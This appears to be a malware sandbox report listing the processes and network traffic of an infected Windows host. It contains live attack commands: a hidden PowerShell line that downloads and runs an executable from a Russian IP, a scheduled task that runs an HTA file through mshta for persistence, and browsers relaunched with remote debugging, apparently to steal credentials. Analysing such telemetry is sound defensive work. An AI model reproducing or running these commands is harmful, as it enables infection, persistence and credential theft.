"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff85403cc40,0x7ff85403cc4c,0x7ff85403cc58

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic cpu get ProcessorId"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3000 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4852 /prefetch:2

C:\Windows\TEMP\{F406E3B2-8A83-4A2A-9DD3-A54B5AB56345}\.cr\z3SJkC5.exe

"C:\Windows\TEMP\{F406E3B2-8A83-4A2A-9DD3-A54B5AB56345}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10096990101\z3SJkC5.exe" -burn.filehandle.attached=764 -burn.filehandle.self=576

C:\Windows\TEMP\{34171AE3-3FDE-44B4-A45A-635DFB75D5E7}\.ba\WiseTurbo.exe

C:\Windows\TEMP\{34171AE3-3FDE-44B4-A45A-635DFB75D5E7}\.ba\WiseTurbo.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 6748 -ip 6748

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get ProcessorId

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 832

C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe

C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6748 -ip 6748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 760

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC BIOS GET SERIALNUMBER"

C:\Windows\System32\Wbem\WMIC.exe

WMIC BIOS GET SERIALNUMBER

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\Temp\10097000101\8jQumY5.exe

"C:\Users\Admin\AppData\Local\Temp\10097000101\8jQumY5.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC COMPUTERSYSTEM GET MODEL"

C:\Windows\System32\Wbem\WMIC.exe

WMIC COMPUTERSYSTEM GET MODEL

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "y7BNMma8Q6u" /tr "mshta \"C:\Temp\OlAu2JEes.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC COMPUTERSYSTEM GET MANUFACTURER"

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\OlAu2JEes.hta"

C:\Windows\System32\Wbem\WMIC.exe

WMIC COMPUTERSYSTEM GET MANUFACTURER

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10097010101\BXxKvLN.exe

"C:\Users\Admin\AppData\Local\Temp\10097010101\BXxKvLN.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10097020101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10097020101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10097020101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10097020101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 8964 -ip 8964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8964 -s 964

C:\Users\Admin\AppData\Local\Temp\10097030101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10097030101\zY9sqWs.exe"

C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe

C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe

C:\Users\Admin\AppData\Local\Temp\10097040101\JCFx2xj.exe

"C:\Users\Admin\AppData\Local\Temp\10097040101\JCFx2xj.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8543046f8,0x7ff854304708,0x7ff854304718

C:\Users\Admin\AppData\Local\Temp\10097050101\4klgwMz.exe

"C:\Users\Admin\AppData\Local\Temp\10097050101\4klgwMz.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2976 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3996 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4116 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3740 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2788 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff86b14cc40,0x7ff86b14cc4c,0x7ff86b14cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2276,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2264 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1808,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2304 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2004,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2416 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3212 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3252 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4492,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4548 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4520,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4532 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4512 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4224,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4504 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10097060101\W6ySCZP.exe

"C:\Users\Admin\AppData\Local\Temp\10097060101\W6ySCZP.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4796,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4908 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10097070101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10097070101\v6Oqdnc.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4232,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4976 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5300,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5248,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5340 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5484,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5488 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8543046f8,0x7ff854304708,0x7ff854304718

Network

Country Destination Domain Proto
US 8.8.8.8:53 calmingtefxtures.run udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
RU 176.113.115.6:80 176.113.115.6 tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 explorebieology.run udp
US 104.21.31.208:443 explorebieology.run tcp
US 104.21.31.208:443 explorebieology.run tcp
US 104.21.31.208:443 explorebieology.run tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 104.21.31.208:443 explorebieology.run tcp
US 8.8.8.8:53 su.t.goldenloafuae.com udp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 104.86.110.232:80 e5.o.lencr.org tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 104.21.31.208:443 explorebieology.run tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 104.21.31.208:443 explorebieology.run tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 135.181.76.95:80 135.181.76.95 tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 172.67.212.102:443 codxefusion.top tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.206:443 clients2.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 142.250.179.225:443 clients2.googleusercontent.com udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 172.217.16.234:443 ogads-pa.googleapis.com udp
GB 216.58.201.110:443 apis.google.com udp
GB 172.217.16.234:443 ogads-pa.googleapis.com tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.46:443 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
GB 142.250.200.46:443 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
N/A 224.0.0.251:5353 udp
US 172.67.212.102:443 codxefusion.top tcp
US 8.8.8.8:53 www.dropbox.com udp
GB 162.125.64.18:443 www.dropbox.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.65.92:443 nw-umwatson.events.data.microsoft.com tcp
US 20.42.65.92:443 nw-umwatson.events.data.microsoft.com tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 13.89.179.12:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 api.telegram.org udp
